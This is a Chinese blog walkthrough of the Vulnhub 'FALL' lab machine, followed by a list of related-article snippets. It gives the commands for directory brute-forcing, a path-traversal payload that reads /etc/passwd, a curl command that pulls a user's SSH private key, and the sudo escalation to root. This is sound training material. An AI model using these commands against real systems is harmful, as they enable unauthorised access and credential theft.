fall靶机攻略

最新推荐文章于 2025-04-29 09:28:25 发布
最新推荐文章于 2025-04-29 09:28:25 发布
阅读量405 收藏 4
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146568791
版权

1、扫描靶机地址

nmap c段

2、访问IP

3、爆破目录

gobuster dir -u http://192.168.19.164 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

扫到这么多,依次看一下响应码是200的目录,最终在robots.txt看到了

暂时还不知道这是什么信息,但是先有个印象,然后我在text.php看到了

告诉我们缺少get参数,说明这里是get传参的,我们尝试一下有没有文件读取漏洞

?file=../../../../../../etc/passwd

说明这里是存在任意文件读取漏洞的,我们看一下里面的信息,发现了用户qiu

去查看他的秘钥

用:curl http://192.168.19.164/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa导出秘钥,再用cat查看:cat id_rsa

为秘钥文件提权

chmod 600 id_rsa

可以看到已经提权了,接着利用秘钥登录这个qiu用户

ssh qiu@192.168.19.164 -i id_rsa

进来之后先查看一下有什么文件

然后去看看这些文件都有什么信息

在历史记录文件发现这个用户输出了remarkablyawesomE并上传了,然后就执行了ifconfig,那可能这个就是密码,用户登上去之后就查看IP,我们尝试一下

输入sudo -l ,把密码输入进去

确实可以,而且权限是和root一个级别的,那么我们切换到root用户,查看文件

sudo su切换到root用户,cat ~/remarks.txt查看flag

[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
FALL靶机攻略
qq_65379983的博客
03-27 1186
FALL靶机攻略 参数的爆破wfuzz ssh私钥连接
FALL靶机渗透攻略
2301_81383433的博客
03-27 596
尝试读取passwd文件:http://192.168.40.147/test.php?查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE。尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa。将靶机和Kali都设置为NAT模式。将私钥保存到Kali中,用私钥登录。
FALL靶机
l2772513700的博客
03-27 286
访问:http://192.168.247.146/test.php,他提示我们参数缺失。出于openssh的安全性,密钥文件权限需要给600才能够正常使用,所有我们给他提权。尝试/etc/passwd,发现正常回显了,是一个文件包含的漏洞.命令来导出这个私钥文件,并且用cat查看一下这个文件,防止出现错误。我们进来之后,用查看一下.bash_history历史记录文件。我们在这里尝试利用文件包含来把qiu的ssh私钥显示出来使用。我们再查看flag文件即可,该靶机就已经完成了。我们爆破一下他的参数。
Vulnhub靶场FALL靶机通关攻略
2302_77611368的博客
03-27 162
把私钥复制到1文件中,保持原来的格式,给文件修改权限。靶机ip为192.168159.158。1.打开靶机和kali。网站根目录下可能有线索。发现/admin网站。访问test.php。找到一个传参file。6.文件上传漏洞利用。
FALL靶机渗透过程
ljh123321ljh的博客
03-27 382
9.我们使用文件包含把qiu的ssh密钥下载到本地并查看。我们发现了一个test.php文件,有点像有问题的文件。10.我们需要600的权限才能使用密钥文件。7.我们使用file传参查看一下用户信息。8.我们尝试查看qiu的ssh密钥。1.在kali中扫描靶机ip。2.在kali中扫描靶机端口。3.我们尝试分析80端口信息。说明我们在该页面可以传参。6.我们尝试爆破一下参数。
FALL靶机渗透实战:从信息收集到特权升级的完整链分析
gysadsadsa的博客
03-27 296
12.用查看一下.bash_history历史记录文件,发现了一个密码"remarkablyawesomE"10.我们在这里尝试利用文件包含来把qiu的ssh私钥显示出来,并且查看一下。13.发现用户可以sudo执行任何命令,提权成功。kali的IP:192.168.139.152。11.密钥文件权限需要给600才能够正常使用。跟着使用这个私钥登录qiu用户,发现连接成功。2.用kali来确定该靶机的IP。执行whoami命令发现获取成功。1.下载靶机,并在虚拟机中打开。7.使用kali自带的FUZZ。
Vulnhub:Digitalword.local (FALL)靶机
qq_43884092的博客
04-15 222
wfuzz爆破test.php的参数,文件包含qiu用户私钥文件,查看.bash_history得到用户qiu的密码
Vulnhub:Digitalword.local: FALL靶机渗透
2301_78554096的博客
03-27 1096
Vulnhub:Digitalword.local: FALL靶机渗透,从信息收集到爆破参数,再从参数到用户私钥,从私钥到登录用户,最后提权查看flag文件
Vulhub靶机--FAll
2401_85578339的博客
03-27 835
这里可以看到ip和部分端口,我们还是扫描一下查看。
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 376
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
靶机精讲】TommyBoy1dot0 vulhub
Hush78的博客
09-27 1432
我们发现没有访问权限,只有www-data才有访问权限,这时我们要思考按照以往的经验来看,一般是通过从web中反弹shell到kali机的用户是www-data,所以我们需要在web中利用www-data权限来查看5.txt,OK思路形成,现在我们寻找哪里有可利用的位置。我们尝试连接ftp协议,这里的账号密码就看我们自己的尝试,尝试过程也是很有用的一个环节,这里省略。在爆破的过程中我们发现了80端口存在非常多的目录,我们随便访问几个响应值为301的目录都是空的,我们便看看是否有响应值为200的目录。
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3309
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-优快云博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
ARP欺诈Java版基于jpcap和WinPcap来实现
David648210的博客
08-04 826
文章目录前言一、准备工作二、代码1.Attack.java2.ArpUtil.java3.Attacker.java4.AttackList.java5.NetUtil.java6.Ping.java7.Raedcsv.java8.UpdateIp.java三、使用注意总结 前言 看了一位大佬的java版的arp欺诈程序就自己照着写了一个 https://blog.youkuaiyun.com/qq_37853750/article/details/100169513?ops_request_misc=%257B%.
redis 7.4.3更新!安全修复+性能优化全解析
福大大架构师每日一题
04-25 413
Redis(Remote Dictionary Server)是一款开源的高性能内存键值数据库,支持持久化、多数据结构(如字符串、哈希、列表等),广泛应用于缓存、消息队列、实时统计等高并发场景。立即行动:若暴露在公网,需优先修复CVE-2025-21605漏洞,避免被恶意利用。• 风险描述:未授权客户端可导致输出缓冲区无限增长,可能引发内存耗尽甚至服务崩溃。典型使用场景:电商秒杀、社交热榜、会话缓存、实时数据分析等。• 丰富功能:支持事务、Lua脚本、发布订阅等。• 解决方案:升级至7.4.3,并启用。
基于STM32、HAL库的ATECC608B安全验证及加密芯片驱动程序设计
最新发布
corlin6688的博客
04-29 150
注意:ATECC608B的I2C地址通常是0x60(7位地址)基于硬件的高安全性加密算法。ECC P-256加密引擎。真随机数生成器(TRNG)I²C接口(最高1MHz)低功耗设计,适合物联网应用。SHA-256哈希算法。16KB安全存储空间。
Java 24 深度解析:云原生时代的性能更新与安全重构
qq_20294455的博客
04-25 1253
Java 24 不仅是一次版本迭代,更是 Java 平台在云原生、后量子安全和开发者生产力领域的战略布局。性能革命:通过内存优化和并发模型升级,满足超大规模系统需求。安全护航:抗量子加密技术为未来十年的信息安全提供保障。生态扩展:云原生特性巩固 Java 在分布式系统领域的统治地位。开发者关怀:语言改进和工具链升级降低开发门槛,提升效率。对于企业而言,Java 24 是构建下一代关键任务系统的必备平台;对于开发者,它是掌握前沿技术、提升竞争力的重要契机。
基于STM32、HAL库的DS2401P安全验证及加密芯片驱动程序设计
corlin6688的博客
04-28 253
1 |--DATA---------->| GPIO (配置为开漏输出)// 检测存在脉冲(设备应在60-240us内拉低总线)// 初始化DS2401P,使用GPIOB, PIN5。// 发送读取ROM命令 (0x33)// 微秒级延迟函数(需要根据系统时钟配置)// 释放总线(上拉电阻将拉高)工作温度范围:-40°C至+85°C。// 配置为开漏输出,无上拉。// 拉低总线至少480us。// 打印ROM信息。// 发送复位脉冲并检测存在脉冲。// 读取DS2401P的ROM。
企业 AD 域安全10大风险场景解析
运维有小邓
04-28 533
Active Directory(AD)作为大多数组织的信息管理中枢,在身份验证与访问控制中发挥着至关重要的作用。这也使其成为网络犯罪分子觊觎的目标,他们不断寻找漏洞以窃取关键数据。为了有效防御AD环境遭受攻击,了解常见的攻击手段以及制定全面的防护策略至关重要。本文将带你了解十大常见AD攻击类型,并介绍如何快速检测和防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值